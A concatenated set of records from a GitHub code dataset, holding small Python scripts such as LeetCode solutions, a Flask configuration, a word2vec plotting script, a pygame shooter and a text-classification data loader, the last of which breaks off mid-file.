+{"seq_id":"30710427869","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def averageOfLevels(self, root: Optional[TreeNode]) -> List[float]:\n queue=[root,-1]\n sum_=[]\n ans=[]\n while queue!=[]:\n a=queue.pop(0)\n if a==-1 :\n ans.append(sum(sum_)/len(sum_))\n sum_=[]\n if queue!=[]:\n queue.append(-1)\n else:\n sum_.append(a.val)\n if a.left:\n queue.append(a.left)\n if a.right:\n queue.append(a.right)\n return ans ","repo_name":"vedaditya/leetcode","sub_path":"637-average-of-levels-in-binary-tree/637-average-of-levels-in-binary-tree.py","file_name":"637-average-of-levels-in-binary-tree.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
+{"seq_id":"5199239899","text":"import boto3 #Para interagir com o AWS S3\nimport pandas as pd\n\n\ns3_client = boto3.client('s3')\ns3_client.download_file(\"datalake-rafa-igti\",\"data/Cronograma de Estudo.xlsx\",\"Download_efetuado.xlsx\") #Fazendo o Dowload no Arquivo\n\npf = pd.read_excel(\"Download_efetuado.xlsx\")\nprint(pf)\n\ns3_client.upload_file(\"Arquivo_para_Upload.xlsx\",\"datalake-rafa-igti\",\"data/Arquivo_para_Upload.xlsx\")","repo_name":"rafael7238/Cursos_Resumos","sub_path":"ENGENHARIA DE DADOS/1_bootcamp_buket_s3.py","file_name":"1_bootcamp_buket_s3.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
+{"seq_id":"17038618383","text":"import json\nimport os\n\ndef validateJsonFile(jsonFile):\n try:\n json.load(jsonFile)\n except ValueError as err:\n print(err)\n return False\n return True\n\npath_to_json = 'json/'\n\njson_files = [pos_json for pos_json in os.listdir(path_to_json) if pos_json.endswith('.json')]\nfor index, js in enumerate(json_files):\n with open(os.path.join(path_to_json, js)) as json_file:\n if(validateJsonFile(json_file)==True):\n print(\"Given JSON file \"+json_files[index]+\" is valid\")\n print(\"------------------------------------\")\n else:\n print(\"Given JSON file \"+json_files[index]+\" is not valid\")\n print(\"------------------------------------\")\n","repo_name":"cepdnaclk/e18-co227-Interactive-Department-Map-GroupA","sub_path":".github/workflows/jsonFormatValidator.py","file_name":"jsonFormatValidator.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"90"}
+{"seq_id":"3385146785","text":"# Configuration file for Flask-WTF\nimport os\n\n# Setup SQL Alchemy\nbasedir = os.path.abspath(os.path.dirname(__file__))\nSQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'app.db')\nSQLALCHEMY_MIGRATE_REPO = os.path.join(basedir, 'db_repository')\n# Disables flask-sqlalchemy's event-notification system (http://bit.ly/1YJ7WXl)\nSQLALCHEMY_TRACK_MODIFICATIONS = False\n\nWTF_CSRF_ENABLED = True # Activates cross-site request forgery prevention\nSECRET_KEY = 'you-will-never-guess' # Needed when CSRF is enabled\n\nOPENID_PROVIDERS = [\n {'name': 'Yahoo', 'url': 'https://me.yahoo.com'},\n {'name': 'AOL', 'url': 'http://openid.aol.com/'},\n {'name': 'Flickr', 'url': 'http://www.flickr.com/'},\n {'name': 'MyOpenID', 'url': 'https://www.myopenid.com'}\n ]\n","repo_name":"treystaff/flask_microblog","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
+{"seq_id":"39344211516","text":"from labjack import ljm\nfrom beampattern.utils.beampattern_exceptions import BeamPatternArgumentError\n\nclass LabJackT7(object):\n def __init__(self, debug=True):\n self.handle = ljm.openS(\"ANY\", \"ANY\", \"ANY\")\n info = ljm.getHandleInfo(self.handle)\n if debug:\n print(\"Opened a LabJack with Device type: %i, Connection type: %i,\\n\"\n \"Serial number: %i, IP address: %s, Port: %i,\\nMax bytes per MB: %i\" %\n (info[0], info[1], info[2], ljm.numberToIP(info[3]), info[4], info[5]))\n\n def digital_output(self, channel, level):\n if channel not in range(8):\n raise BeamPatternArgumentError(\"LabJack T7\", \"channel should be >= 0 and <8\")\n if level not in (0, 1):\n raise BeamPatternArgumentError(\"LabJack T7\", \"level should be 0 or 1\")\n ljm.eWriteName(self.handle, 'FIO%1d' % channel, level)\n\n \n","repo_name":"gopastro/pybeampattern","sub_path":"beampattern/labjack/labjack_t7.py","file_name":"labjack_t7.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
+{"seq_id":"24083214664","text":"# -*- coding: utf-8 -*-\nimport os\nfrom gensim.models import Word2Vec\nfrom matplotlib import pyplot\nimport pandas as pd\nimport numpy as np\nfrom scipy import spatial\n\n# %%\n\ndef read_excel(filename, sheet):\n if not os.path.isfile(filename):\n raise Exception(\"File {0} does not exist!\".format(filename))\n with pd.ExcelFile(filename) as xls:\n return pd.read_excel(xls, sheet)\n\ndef save_excel(data, filename):\n with pd.ExcelWriter(filename) as writer:\n for (df, name) in data:\n df.to_excel(writer, name)\n writer.save()\n\ndef load_model_vector(filename):\n model = Word2Vec.load(filename)\n word_vectors = model.wv\n del model\n return word_vectors\n\n# %%\n\nclass SimilarWordGenerater():\n\n def __init__(self, word_vectors):\n self.word_vectors = word_vectors\n\n def flatten(self, items):\n return [ item for sublist in items for item in sublist ]\n\n def get_similar(self, words, iter=1, topn=3, similar_threshold = 0.0):\n return self.flatten([ [ y[0] for y in self.word_vectors.most_similar(x, topn=topn) if y[1] >= similar_threshold ] for x in words ])\n\n #def generate0(self, words, iter=1, topn=3, similar_threshold = 0.0):\n # if isinstance(words,str): words = [ words ]\n # if iter < 0 or len(words) == 0: return []\n # similar_words = list(set(self.get_similar(words, iter, topn, similar_threshold)) - set(words))\n # return list(set(words + self.generate0(similar_words, iter-1, topn)))\n\n def generate(self, words, iter=1, topn=3, cumulated_words = [], similar_threshold = 0.5):\n #print('{}: {}'.format(iter, cumulated_words))\n if isinstance(words,str): words = [ words ]\n if iter < 0 or len(words) == 0: return cumulated_words\n cumulated_words = list(set(cumulated_words + words))\n similar_words = list(set(self.get_similar(words, iter, topn, similar_threshold)) - set(cumulated_words))\n return self.generate(similar_words, iter-1, topn, cumulated_words)\n\n# %%\ndef word_scale_similarity(word_vectors, scale_x_pair, scale_y_pair, word_list):\n\n scale_x = word_vectors[scale_x_pair[0]] - word_vectors[scale_x_pair[1]]\n scale_y = word_vectors[scale_y_pair[0]] - word_vectors[scale_y_pair[1]]\n\n word_x_similarity = [1 - spatial.distance.cosine(scale_x, word_vectors[x]) for x in word_list ]\n word_y_similarity = [1 - spatial.distance.cosine(scale_y, word_vectors[x]) for x in word_list ]\n\n df = pd.DataFrame({ 'word': word_list, 'x': word_x_similarity, 'y': word_y_similarity })\n\n return df\n\n# %%\n\ndef word_pair_list_similarity(word_vectors, word_x, word_y, word_list):\n\n word_x_similarity = [ word_vectors.similarity(x, word_x) for x in word_list ]\n word_y_similarity = [ word_vectors.similarity(x, word_y) for x in word_list ]\n\n df = pd.DataFrame({ 'word': word_list, 'x': word_x_similarity, 'y': word_y_similarity })\n\n return df\n\n# %%\n\ndef word_pair_list_similarity2(word_vectors, word_x, word_y, seed_word, topn=100):\n\n\n word_toplist = [ seed_word ] + [ z[0] for z in word_vectors.most_similar_cosmul(seed_word, topn=100) ]\n\n word_x_similarity = [ word_vectors.similarity(x, word_x) for x in word_toplist ]\n word_y_similarity = [ word_vectors.similarity(x, word_y) for x in word_toplist ]\n\n df = pd.DataFrame({ 'word': word_toplist, 'x': word_x_similarity, 'y': word_y_similarity })\n\n return df\n\n# %%\n\ndef word_pair_toplist_similarity(word_vectors, word_x, word_y, topn=50):\n\n word_x_toplist = [ word_x ] + word_vectors.most_similar_cosmul(word_x, topn=topn)\n word_y_toplist = [ word_y ] + word_vectors.most_similar_cosmul(word_y, topn=topn)\n\n word_toplist = [ x[0] for x in word_x_toplist + word_y_toplist ]\n\n return word_pair_list_similarity(word_vectors, word_x, word_y, word_toplist)\n\n## %%\n#\n#def word_pair_list_similarity(word_vectors, word_x, word_y, word_list, topn=50):\n#\n# word_x_toplist = [ word_x ] + word_vectors.most_similar_cosmul(word_x, topn=topn)\n# word_y_toplist = [ word_y ] + word_vectors.most_similar_cosmul(word_y, topn=topn)\n#\n# word_toplist = [ x[0] for x in wordlist ]\n#\n# word_x_similarity = [ word_vectors.similarity(x, word_x) for x in word_toplist ]\n# word_y_similarity = [ word_vectors.similarity(x, word_y) for x in word_toplist ]\n#\n# df = pd.DataFrame({ 'word': word_toplist, 'x': word_x_similarity, 'y': word_y_similarity })\n#\n# return df\n# %%\n\ndef plot_df(df,xlabel=None,ylabel=None):\n fig = pyplot.figure()\n #pyplot.plot([0,0.75], [0,0.75])\n if not xlabel is None: pyplot.xlabel(xlabel)\n if not ylabel is None: pyplot.ylabel(ylabel)\n ax = fig.add_subplot(1, 1, 1)\n ax.scatter(df['x'], df['y'],marker='o')\n for i, txt in enumerate(df['word']):\n ax.annotate(txt, xy=(df['x'].iloc[i], df['y'].iloc[i])) #, textcoords = 'offset points', ha = 'left', va = 'top', **TEXT_KW)\n pyplot.show()\n\n# %%\n\ndef generate_plot(words, x_word, y_word, iter=5, topn=3, similar_threshold= 0.5):\n word_list = SimilarWordGenerater(word_vectors).generate(words, iter, topn, [], similar_threshold)\n df = word_pair_list_similarity(word_vectors, x_word, y_word, word_list)\n plot_df(df,'<--- {} --->'.format(x_word), '<--- {} --->'.format(y_word))\n\n\n# %%\n\n#filename = '../data/output/w2v_model_skip_gram_win_5_dim_50_iter_20_mc_5_complete_not_segmented.dat'\n#filename = '../data/output/w2v_model_skip_gram_win_10_dim_100_iter_20_mc_5_segmented_1980-1014.dat'\n\n# %%\nfilename = '../data/output/w2v_model_skip_gram_win_5_dim_100_iter_20_mc_5_benedict-xvi.dat'\n\nword_vectors = load_model_vector(filename)\n\n# %%\n#word_list = SimilarWordGenerater(word_vectors).generate(['jordbruk'], 5, topn=3)\n\n\ndf_toplist = read_excel(\"../relevant_words.xlsx\", \"toplist1\")\nword_list = list(df_toplist.words.values)\n\nword_list = [ x for x in word_list if x in word_vectors.vocab.keys() ]\n\n# %%\ndf = word_pair_list_similarity(word_vectors, 'west', 'east', word_list)\nplot_df(df,'<--- West --->', '<--- East --->')\n\n\n# %%\n\ndf = word_pair_toplist_similarity(word_vectors, 'west', 'evil')\nplot_df(df,'West', 'East')\n\n\n# %%\n\ndf = word_pair_list_similarity2(word_vectors, 'north', 'south', 'poor')\nplot_df(df,'North', 'South')\n\n# %%\n\ndf = word_pair_toplist_similarity(word_vectors, 'industri', 'jordbruk')\nplot_df(df)\n# %%\n\ndf = word_pair_toplist_similarity(word_vectors, 'krig', 'fred')\nplot_df(df)\n# %%\n\ndf = word_pair_toplist_similarity(word_vectors, 'industri', 'hantverk')\nplot_df(df)\n\n\n# %%\ndf_swe_loc = pd.read_excel('../data/ner_swe_loc_plc.xlsx', 'swe_loc_plc')\ndf_place_minus_one = pd.DataFrame(df_swe_loc.place.apply(lambda x: x[:-1]))\ndf_place_minus_one.columns = ['place']\nswe_loc_list = list(pd.merge(df_swe_loc,df_place_minus_one,how='inner',left_on='place',right_on='place')['place'].unique())\nswe_loc_list = [ x for x in swe_loc_list if x in word_vectors.vocab ]\ndf = word_pair_list_similarity(word_vectors, 'industri', 'jordbruk',swe_loc_list)\nplot_df(df,'<--- Industri --->', '<--- Jordbruk --->')\n\n\n# %%\n\ndf = word_pair_toplist_similarity(word_vectors, 'girl', 'boy')\nplot_df(df, 'Girl', 'Boy')\n\n# %%\nword_list = SimilarWordGenerater(word_vectors).generate(['kärnkraft'], 5, topn=3)\ndf_scale = word_scale_similarity(word_vectors, ('stad', 'landsbygd'), ('jordbruk', 'industri'), word_list)\nplot_df(df_scale, 'Stad ---- Landsbygd', 'jordbruk ---- industri')\n\n# %%\nword_list = generate_similar_list(word_vectors, ['kärnkraft'], 5, topn=2)\ndf = word_pair_list_similarity(word_vectors, 'sovjetunionen', 'england',word_list)\nplot_df(df, 'Sovjet', 'England')\n\n\n","repo_name":"humlab/text_analytic_tools","sub_path":"pending_deletes/vector_spaces/scripts/visualize_analogy.py","file_name":"visualize_analogy.py","file_ext":"py","file_size_in_byte":7521,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"}
+{"seq_id":"43002952995","text":"# 4 . Try to extract only a list collection form list l\r\n\r\n# Try to extract only a list collection form list l\r\nimport logging\r\nlogging.basicConfig(filename=\"logfile1.log\",level=logging.INFO,format='%(asctime)s %(levelname)s %(message)s')\r\n\r\nclass Program4:\r\n\r\n log = logging.getLogger(\"logfile1.log\")\r\n # Declare a list\r\n try:\r\n l = [3, 4, 5, 6, 7, [23, 456, 67, 8, 78, 78], [345, 56, 87, 8, 98, 9], (234, 6657, 6),\r\n {\"key1\": \"sudh\", 234: [23, 45, 656]}]\r\n\r\n except Exception as e:\r\n log.info(e)\r\n\r\n # extract only a list collection form list l\r\n\r\n log.info(\"extract only a list collection form list l\")\r\n log.info(l[-4:-1])","repo_name":"Sharanv321/Data-Science-iNeuron-TasksChallenges","sub_path":"Task-2July2022-main/Program4.py","file_name":"Program4.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
+{"seq_id":"26326846755","text":"import sys\nimport io\nimport math\nsys.setrecursionlimit(10**8)\n_INPUT = \"\"\"\\\n125 175 250 300 400 525 600 650\n\"\"\"\nsys.stdin = io.StringIO(_INPUT)\nreadline=sys.stdin.readline\nS = list(map(int, readline().split()))\nfor i in range(len(S)):\n s = S[i]\n if s % 25 != 0:\n break\n if s < 100 or s > 675:\n break\n if i != 0 and s < S[i-1]:\n \n break\nelse:\n print(\"Yes\")\n exit()\nprint(\"No\")","repo_name":"Amano-take/Atcoder","sub_path":"300/0/308/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
+{"seq_id":"32986079098","text":"from challenges.tree.tree import *\nfrom challenges.tree.fizz_buzz_tree import *\n\ndef test_fizz_buzz():\n fizz = BinaryTree()\n fizz.root = TNode(1)\n fizz.root.left = TNode(10)\n fizz.root.right = TNode(12)\n fizz.root.left.left = TNode(2)\n fizz.root.left.right = TNode(18)\n fizz.root.right.right = TNode(15)\n actual = fizz_buzz_tree(fizz).pre_order()\n print(actual)\n expected = \"[1, 'Buzz', 2, 'Fizz', 'Fizz', 'FizzBuzz']\"\n assert actual == expected\n\ndef test_fizz_buzz_second():\n fizz = BinaryTree()\n fizz.root = TNode(1)\n fizz.root.left = TNode(3)\n fizz.root.right = TNode(9)\n fizz.root.left.left = TNode(12)\n fizz.root.left.right = TNode(15)\n fizz.root.right.right = TNode(18)\n fizz.root.right.right.right = TNode(30)\n actual = fizz_buzz_tree(fizz).pre_order()\n print(actual)\n expected = \"[1, 'Fizz', 'Fizz', 'FizzBuzz', 'Fizz', 'Fizz', 'FizzBuzz']\"\n assert actual == expected\n\ndef test_fizz_buzz_second():\n fizz = BinaryTree()\n fizz.root = TNode(2)\n fizz.root.left = TNode(4)\n fizz.root.right = TNode(8)\n fizz.root.left.left = TNode(13)\n fizz.root.left.right = TNode(19)\n fizz.root.right.right = TNode(22)\n fizz.root.right.right.right = TNode(26)\n actual = fizz_buzz_tree(fizz).pre_order()\n print(actual)\n expected = \"[2, 4, 13, 19, 8, 22, 26]\"\n assert actual == expected\n\n","repo_name":"YahyaOmari/data-structures-and-algorithms","sub_path":"python/tests/test_fizz_buzz.py","file_name":"test_fizz_buzz.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
+{"seq_id":"16829476415","text":"import requests, pandas, csv, time\nimport mail,music\nurl1=\"http://info512.taifex.com.tw/Future/FusaQuote_Norl.aspx\"\nurl2=\"http://info512ah.taifex.com.tw/Future/FusaQuote_Norl.aspx\"\n\n\ndef main():\n\t'''\n\t\tsetting entry,price,mail,music from function\n\t'''\n\n\tentry=setting_entry()\n\tprice=setting_price()\n\tmail_control={'mail_times_max':setting_mail_times_max(),'mail_times':0}\n\tmusic_control=setting_music()\n\t#Every 5 secs check\n\twhile 1:\n\t\t'''\n\t\t\tcrawl and check price\n\t\t'''\n\n\t\ttime.sleep(1)\n\t\tvartime=time.localtime()\n\t\turl=check_url()\n\t\tif not url: \n\t\t\tprint('睡覺')\n\t\t\tcontinue\n\t\ttry:\n\t\t\tmail_control=check_price(url,vartime,entry,price,mail_control,music_control)\n\t\texcept KeyboardInterrupt:\n\t\t\tprint(\"Stop\")\n\t\texcept (IndexError,TypeError):\n\t\t\tprint(\"IndexError or TypeError\")\n\t\texcept ConnectionError:\n\t\t\tprint(\"ConnectionError\")\n\t\texcept:\n\t\t \tprint(\"Some Error\")\ndef check_url():\n\t'''\n\t\tcheck time to change url or sleep\n\t'''\n\n\tif time.localtime().tm_wday==5 and time.localtime().tm_hour==5 :\n\t\tprint('週末睡兩天')\n\t\twhile(1):\n\t\t\ttime.sleep(60)\n\t\t\tif time.localtime().tm_wday==7 and time.localtime().tm_hour==5 :\n\t\t\t\tbreak\n\telif ((time.localtime().tm_hour*60+time.localtime().tm_min>=8*60+45) and \n\t\t(time.localtime().tm_hour*60+time.localtime().tm_min<=13*60+45)):\n\t\turl=url1\n\telif((time.localtime().tm_hour*60+time.localtime().tm_min>=15*60) or\n\t\t(time.localtime().tm_hour*60+time.localtime().tm_min<=5*60)):\n\t\turl=url2\n\telse :\n\t\turl=''\n\treturn url\n\ndef check_price(url,vartime,entry,price,mail_control,music_control):\n\t'''\n\t\tcrawl price and caculate profit \n\t\tif touch price , send mail\n\t'''\n\tres=requests.post(url)\n\tres.encoding='utf-8'\n\tdf=pandas.read_html(res.text, attrs={'class':'custDataGrid'})[0].iloc[2][2]\n\n\t##crawl price\n\tif(entry['toggle']=='y'):\n\t\tprofit=str((float(df)-float(entry['entry_price']))*float(entry['position'])*float(entry['lot'])*50)\n\t\tprint(time.strftime('%Y/%m/%d %H:%M:%S',vartime)+'\\t即時報價'+df+'\\t損益金額'+profit+'元')\n\n\telse:\n\t\tprint(time.strftime('%Y/%m/%d %H:%M:%S',vartime)+'\\t即時報價'+df)\n\n\t##send mail\t\n\tif float(df)<=price[0] and mail_control['mail_times']=price[1] and mail_control['mail_times'] 1번에 10만큼 이동해야함 -> 10*10\n # 20 fps : 1초 동안 20번 동작 - > 1번에 5만큼 이동헤야함 -> 5*20\n\n # print('fps : ' + str(clock.get_fps())) # 초당 프레임 수 출력\n\n\n # 2. 이벤트 처리 (키보드, 마우스 등)\n for event in pygame.event.get(): # 반드시 작성되어야 하는 코드, 어떤 이벤트가 발생하였는지?\n if event.type == pygame.QUIT: # 종료 버튼을 눌렀을 경우 게임은 종료, 창이 닫히는 이벤트가 발생하였는지?\n running = False # while문 종료, 게임 진행중 아님\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT: # 캐릭터를 좌측으로\n character_to_x -= character_speed\n elif event.key == pygame.K_RIGHT: # 캐릭터를 우측으로\n character_to_x += character_speed\n elif event.key == pygame.K_SPACE: # 무기발사\n weapon_x_pos = character_x_pos + (character_width / 2) - (weapon_width / 2)\n weapon_y_pos = character_y_pos\n weapons.append([weapon_x_pos, weapon_y_pos])\n \n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\n character_to_x = 0\n\n\n # 3. 게임 캐릭터 위치 정의\n # 포지션 값을 변경해준다\n character_x_pos += character_to_x\n\n if character_x_pos < 0:\n character_x_pos = 0\n elif character_x_pos > screen_width - character_width:\n character_x_pos = screen_width - character_width \n\n # 무기 위치 조정\n # 100, 200 -> 180, 160, 140, ...\n # 500, 200 -> 180, 160, 140, ...\n # 모든 무기에 대해서 y의 위치를 변경가능\n weapons = [ [w[0], w[1] - weapon_speed] for w in weapons] # 무기 위치를 위로 올린다\n\n # 천장에 닿은 무기 없애기\n weapons = [ [w[0], w[1]] for w in weapons if w[1] > 0]\n\n # 4. 충돌 처리\n # 충돌 처리 (실제로 위치하고 있는 rect정보를 업데이트)\n \n\n\n # 5. 화면에 그리기\n screen.blit(background,(0,0))\n\n for weapon_x_pos, weapon_y_pos in weapons:\n screen.blit(weapon, (weapon_x_pos, weapon_y_pos))\n\n screen.blit(stage,(0,screen_height - stage_height))\n screen.blit(character,(character_x_pos,character_y_pos))\n\n \n\n\n # 게임화면 다시 그리기\n pygame.display.update()\n\n\n\n# 게임 종료\npygame.quit()","repo_name":"Comprehensible7/TIL","sub_path":"Python/Test_Project3/Basic_Frame2/2_weapon_keyevent.py","file_name":"2_weapon_keyevent.py","file_ext":"py","file_size_in_byte":4556,"program_lang":"python","lang":"ko","doc_type":"code","stars":4,"dataset":"github-code","pt":"90"}
+{"seq_id":"10078063306","text":"import os\nfrom time import gmtime, strftime, time\nfrom struct import pack\nimport logging\nimport atexit\n\n\nclass Log:\n FILE_EXT = 'csv'\n FILE_MODE = 'w'\n\n def __init__(self, cfg, signal_new_file=None):\n self.__logger = logging.getLogger(self.__class__.__name__)\n # Load Config\n if 'filename_prefix' not in cfg.keys():\n cfg['filename_prefix'] = 'Inlinino'\n if 'filename_suffix' not in cfg.keys():\n cfg['filename_suffix'] = ''\n if 'path' not in cfg.keys():\n cfg['path'] = ''\n if 'length' not in cfg.keys():\n cfg['length'] = 60 # minutes\n if 'variable_names' not in cfg.keys():\n cfg['variable_names'] = []\n if 'variable_units' not in cfg.keys():\n cfg['variable_units'] = []\n if 'variable_precision' not in cfg.keys():\n cfg['variable_precision'] = []\n\n self._file = type('obj', (object,), {'closed': True})\n self._file_timestamp = None\n # self.file_mode_binary = cfg['mode_binary']\n self.file_length = cfg['length'] * 60 # seconds\n self.filename_prefix = cfg['filename_prefix']\n self.filename_suffix = cfg['filename_suffix']\n self.filename = None\n self.set_filename()\n self.path = cfg['path']\n self.signal_new_file = signal_new_file\n\n self.variable_names = cfg['variable_names']\n self.variable_units = cfg['variable_units']\n self.variable_precision = cfg['variable_precision']\n\n atexit.register(self.close)\n\n def update_cfg(self, cfg):\n self.__logger.debug('Update configuration')\n for k in cfg.keys():\n setattr(self, k, cfg[k])\n self.set_filename()\n\n def set_filename(self, timestamp=None):\n suffix = '_' + self.filename_suffix if self.filename_suffix else ''\n if timestamp:\n if not os.path.exists(self.path):\n os.makedirs(self.path)\n self.filename = self.filename_prefix + '_' + strftime('%Y%m%d_%H%M%S', gmtime(timestamp)) + \\\n suffix + '.' + self.FILE_EXT\n suffix_id = 0\n while os.path.exists(os.path.join(self.path, self.filename)):\n self.filename = self.filename_prefix + '_' + strftime('%Y%m%d_%H%M%S', gmtime(timestamp)) + \\\n '_' + str(suffix_id) + suffix + '.' + self.FILE_EXT\n suffix_id += 1\n else:\n self.filename = self.filename_prefix + '__
and and ...\n {r'(p|h\\d)\\s*>\\s*': u'\\n\\n'}, # newline after and and ...\n {r'.*<\\s*(/head|body)[^>]*>': u''}, # remove to \n {r']*>.*': r'\\1'}, # show links instead of texts\n {r'[ \\t]*<[^<]*?/?>': u''}, # remove remaining tags\n {r'^\\s+': u''} # remove spaces at the beginning\n ]\n for rule in rules:\n for (k, v) in rule.items():\n regex = re.compile(k)\n text = regex.sub(v, text)\n text = text.rstrip()\n text = text.strip()\n return text.lower()\n\n\ndef loadData_Tokenizer(DATASET, MAX_NB_WORDS,MAX_SEQUENCE_LENGTH):\n\n # print(path_WOS)\n if DATASET == 1:\n fname = os.path.join(path_WOS,\"WebOfScience/WOS5736/X.txt\")\n fnamek = os.path.join(path_WOS,\"WebOfScience/WOS5736/YL1.txt\")\n fnameL2 = os.path.join(path_WOS,\"WebOfScience/WOS5736/YL2.txt\")\n fnameAll = os.path.join(path_WOS,\"WebOfScience/WOS5736/Y.txt\")\n elif DATASET == 2:\n fname = os.path.join(path_WOS, \"WebOfScience/WOS11967/X.txt\")\n fnamek = os.path.join(path_WOS, \"WebOfScience/WOS11967/YL1.txt\")\n fnameL2 = os.path.join(path_WOS, \"WebOfScience/WOS11967/YL2.txt\")\n fnameAll = os.path.join(path_WOS, \"WebOfScience/WOS11967/Y.txt\")\n else:\n fname = os.path.join(path_WOS, \"WebOfScience/WOS46985/X.txt\")\n fnamek = os.path.join(path_WOS, \"WebOfScience/WOS46985/YL1.txt\")\n fnameL2 = os.path.join(path_WOS, \"WebOfScience/WOS46985/YL2.txt\")\n fnameAll = os.path.join(path_WOS, \"WebOfScience/WOS46985/Y.txt\")\n \n with open(fname) as f:\n content = f.readlines()\n content = [clean_str(x) for x in content]\n content = np.array(content)\n with open(fnamek) as fk:\n contentk = fk.readlines()\n contentk = [x.strip() for x in contentk]\n number_of_classes_L1 = len(set(contentk))\n # print(contentk)\n # print(len(contentk))\n # with open(fnameL2) as fk:\n # contentL2 = fk.readlines()\n # contentL2 = [x.strip() for x in contentL2]\n with open(fnameAll) as fk:\n contentL2 = fk.readlines()\n contentL2 = [x.strip() for x in contentL2]\n # print(len(contentL2))\n\n Label = np.matrix(contentk, dtype=int)\n # number_of_classes_L1 = len(np.unique(Label[0])) # number of classes in Level 1\n Label = np.transpose(Label)\n\n\n Label_L2 = np.matrix(contentL2, dtype=int)\n Label_L2 = np.transpose(Label_L2)\n np.random.seed(7)\n\n Label = np.column_stack((Label, Label_L2))\n\n number_of_classes_L2 = np.zeros(number_of_classes_L1,dtype=int) #number of classes in Level 2 that is 1D array with size of (number of classes in level one,1)\n\n print(type(content[:10]))\n tokenizer = Tokenizer(num_words=MAX_NB_WORDS)\n tokenizer.fit_on_texts(content)\n sequences = tokenizer.texts_to_sequences(content)\n word_index = tokenizer.word_index\n\n print('Found %s unique tokens.' % len(word_index))\n\n content = pad_sequences(sequences, maxlen=MAX_SEQUENCE_LENGTH)\n\n indices = np.arange(content.shape[0])\n np.random.shuffle(indices)\n content = content[indices]\n Label = Label[indices]\n print(\"content shape\",content.shape)\n\n X_train, X_test, y_train, y_test = \\\n train_test_split(content, Label, test_size=0.1, random_state=0)\n X_train, X_val, y_train, y_val = \\\n train_test_split(X_train, y_train, test_size=0.1, random_state=0)\n print(\"%d for training, %d for val, %d for testing\"%(len(y_train),len(y_val),len(y_test)))\n\n L2_Train = []\n L2_Val = []\n content_L2_Train = []\n content_L2_Val = []\n L2_class_dict=[]\n '''\n crewate #L1 number of train and test sample for level two \n of Hierarchical Deep Learning models\n '''\n for i in range(0, number_of_classes_L1):\n L2_Train.append([])\n L2_Val.append([])\n content_L2_Train.append([])\n content_L2_Val.append([])\n # L2_class_dict.append({})\n\n X_train = np.array(X_train)\n X_val= np.array(X_val)\n \n for i in range(0, X_train.shape[0]):\n L2_Train[y_train[i, 0]].append(y_train[i, 1])\n content_L2_Train[y_train[i, 0]].append(X_train[i])\n \n # number_of_classes_L2[y_train[i, 0]] = \\\n # max(number_of_classes_L2[y_train[i, 0]], (y_train[i, 1] + 1))\n\n for i in range(0, X_val.shape[0]):\n L2_Val[y_val[i, 0]].append(y_val[i, 1])\n content_L2_Val[y_val[i, 0]].append(X_val[i])\n\n def create_class_dict(y_labels):\n y2i={}\n # this function takes labels in L2 and \n # transform into range (0,max_classes) for train\n unique_labels = set(np.unique(y_labels))\n for i,label in enumerate(unique_labels):\n y2i[label]=i\n return y2i\n \n #transform to np array\n for i in range(0, number_of_classes_L1):\n L2_Train[i] = np.array(L2_Train[i])\n L2_Val[i] = np.array(L2_Val[i])\n content_L2_Train[i] = np.array(content_L2_Train[i])\n content_L2_Val[i] = np.array(content_L2_Val[i])\n #add number of classes for each sub-classifier\n number_of_classes_L2[i] = len(np.unique(L2_Train[i]))\n L2_class_dict.append(create_class_dict(L2_Train[i]))\n # create class_dict for each sub-class\n \n #translate L2 labels by the dict\n for i in range(0, number_of_classes_L1):\n L2_Train[i] = np.array([L2_class_dict[i][y] for y in L2_Train[i]])\n L2_Val[i] = np.array([L2_class_dict[i][y] for y in L2_Val[i]])\n\n embeddings_index = {}\n '''\n For CNN and RNN, we used the text vector-space models using $100$ dimensions as described in Glove. A vector-space model is a mathematical mapping of the word space\n '''\n Glove_path = os.path.join(GLOVE_DIR, 'glove.6B.100d.txt')\n # print(Glove_path)\n f = open(Glove_path, encoding=\"utf8\")\n for line in f:\n values = line.split()\n word = values[0]\n try:\n coefs = np.asarray(values[1:], dtype='float32')\n except:\n print(\"Warnning\"+str(values)+\" in\" + str(line))\n embeddings_index[word] = coefs\n f.close()\n print('Total %s word vectors.' % len(embeddings_index))\n return (X_train, y_train, X_val, y_val, X_test, y_test, \n content_L2_Train, L2_Train, content_L2_Val, L2_Val,\n number_of_classes_L2,L2_class_dict,\n word_index,embeddings_index,number_of_classes_L1)\n\n\ndef loadData():\n WOS.download_and_extract()\n fname = os.path.join(path_WOS,\"WebOfScience/WOS5736/X.txt\")\n fnamek = os.path.join(path_WOS,\"WebOfScience/WOS5736/YL1.txt\")\n fnameL2 = os.path.join(path_WOS,\"WebOfScience/WOS5736/YL2.txt\")\n with open(fname) as f:\n content = f.readlines()\n content = [text_cleaner(x) for x in content]\n with open(fnamek) as fk:\n contentk = fk.readlines()\n contentk = [x.strip() for x in contentk]\n with open(fnameL2) as fk:\n contentL2 = fk.readlines()\n contentL2 = [x.strip() for x in contentL2]\n Label = np.matrix(contentk, dtype=int)\n Label = np.transpose(Label)\n number_of_classes_L1 = np.max(Label)+1 # number of classes in Level 1\n\n Label_L2 